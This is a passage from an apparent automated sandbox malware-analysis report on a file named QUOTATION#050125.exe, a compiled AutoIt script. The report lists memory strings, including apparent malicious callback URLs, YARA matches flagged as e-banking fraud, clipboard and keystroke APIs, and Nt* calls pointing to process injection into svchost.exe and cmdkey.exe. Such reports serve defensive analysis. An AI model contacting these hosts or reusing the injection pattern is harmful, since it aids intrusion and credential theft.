                Source: firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/r1.crl0
                Source: firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/r1.crt0
                Source: cmdkey.exe, 00000006.00000002.292818357888.0000000004B08000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.0000000004068000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://maximumgroup.co.za/cxj4/?80k=lRapCPMXgDk&6B-l7F=gKtC9mpNHTkTr00JCblrl8a3AfTX/duoM8EbXMKNjeYmE
                Source: cmdkey.exe, 00000006.00000002.292818357888.0000000004B08000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.0000000004068000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://maximumgroup.co.za/cxj4/?80k=lRapCPMXgDk&amp;6B-l7F=gKtC9mpNHTkTr00JCblrl8a3AfTX/duoM8EbXMKNj
                Source: firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: cmdkey.exe, 00000006.00000002.292818357888.0000000004C9A000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000041FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://push.zhanzhang.baidu.com/push.js
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
                Source: cmdkey.exe, 00000006.00000002.292818357888.0000000003CE6000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.0000000003246000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.chiro.live/jwa9?gp=1&js=1&uuid=1736438267.0098365932&other_args=eyJ1cmkiOiAiL2p3YTkiLCAiY
                Source: SwDwSdNMaTt.exe, 00000007.00000002.293705525670.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ogbos88.cyou
                Source: SwDwSdNMaTt.exe, 00000007.00000002.293705525670.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ogbos88.cyou/kj1o/
                Source: cmdkey.exe, 00000006.00000002.292818357888.0000000004C9A000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000041FA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.zbywl.com/js.js
                Source: SwDwSdNMaTt.exe, 00000007.00000002.293707698132.0000000003246000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www70.chiro.live/
                Source: firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
                Source: firefox.exe, 00000008.00000003.289522257897.0000026A53F98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
                Source: cmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: cmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: cmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: cmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: cmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: cmdkey.exe, 00000006.00000002.292818357888.000000000400A000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.000000000356A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
                Source: cmdkey.exe, 00000006.00000003.289456056159.0000000007C93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd
                Source: cmdkey.exe, 00000006.00000002.292815481224.0000000000ACB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
                Source: cmdkey.exe, 00000006.00000002.292815481224.0000000000ACB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
                Source: cmdkey.exe, 00000006.00000002.292818357888.00000000047E4000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.0000000003D44000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://ogbos88vip.click
                Source: cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
                Source: cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
                Source: cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
                Source: cmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
                Source: cmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: cmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
                Source: SwDwSdNMaTt.exe, 00000007.00000002.293707698132.000000000451E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.furrcali.xyz/k29t/?6B-l7F=mLM4NyV3Rm7LSF6x/a3vps0uRUV7zEkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGe
                Source: cmdkey.exe, 00000006.00000002.292820180506.0000000007CBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/favicon.ico
                Source: cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
                Source: cmdkey.exe, 00000006.00000002.292819958102.00000000061F0000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.0000000003B54000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000012344000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
                Source: cmdkey.exe, 00000006.00000002.292818357888.0000000004C9A000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293707698132.00000000041FA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 2_2_0013EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_0013EAFF
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 2_2_0013ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_0013ED6A
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 2_2_0012AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,2_2_0012AA57
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 2_2_00159576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00159576

                E-Banking Fraud

                Source: Yara match	File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match	File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match	File source: 00000007.00000002.293705525670.0000000000C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match	File source: 00000003.00000002.289274740765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match	File source: 00000003.00000002.289276636608.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match	File source: 00000003.00000002.289276489302.0000000003BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match	File source: 00000006.00000002.292817073543.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match	File source: 00000006.00000002.292817177626.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match	File source: 00000005.00000002.293706459836.0000000004460000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: QUOTATION#050125.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: QUOTATION#050125.exe, 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b03b4d24-e
                Source: QUOTATION#050125.exe, 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_e5ea26eb-8
                Source: QUOTATION#050125.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6b27d084-2
                Source: QUOTATION#050125.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d1d263f4-f
                Source: initial sampleStatic PE information: Filename: QUOTATION#050125.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0042CA33 NtClose,3_2_0042CA33
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872B90 NtFreeVirtualMemory,LdrInitializeThunk,3_2_03872B90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872A80 NtClose,LdrInitializeThunk,3_2_03872A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872D10 NtQuerySystemInformation,LdrInitializeThunk,3_2_03872D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038734E0 NtCreateMutant,LdrInitializeThunk,3_2_038734E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03874260 NtSetContextThread,3_2_03874260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03874570 NtSuspendThread,3_2_03874570
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872B80 NtCreateKey,3_2_03872B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872BC0 NtQueryInformationToken,3_2_03872BC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872BE0 NtQueryVirtualMemory,3_2_03872BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872B00 NtQueryValueKey,3_2_03872B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872B10 NtAllocateVirtualMemory,3_2_03872B10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872B20 NtQueryInformationProcess,3_2_03872B20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872AA0 NtQueryInformationFile,3_2_03872AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872AC0 NtEnumerateValueKey,3_2_03872AC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872A10 NtWriteFile,3_2_03872A10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038729D0 NtWaitForSingleObject,3_2_038729D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038729F0 NtReadFile,3_2_038729F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872FB0 NtSetValueKey,3_2_03872FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872F00 NtCreateFile,3_2_03872F00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872F30 NtOpenDirectoryObject,3_2_03872F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872E80 NtCreateProcessEx,3_2_03872E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872EB0 NtProtectVirtualMemory,3_2_03872EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872EC0 NtQuerySection,3_2_03872EC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872ED0 NtResumeThread,3_2_03872ED0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872E00 NtQueueApcThread,3_2_03872E00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872E50 NtCreateSection,3_2_03872E50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872DA0 NtReadVirtualMemory,3_2_03872DA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872DC0 NtAdjustPrivilegesToken,3_2_03872DC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872D50 NtWriteVirtualMemory,3_2_03872D50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872CD0 NtEnumerateKey,3_2_03872CD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872CF0 NtDelayExecution,3_2_03872CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872C10 NtOpenProcess,3_2_03872C10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872C20 NtSetInformationFile,3_2_03872C20
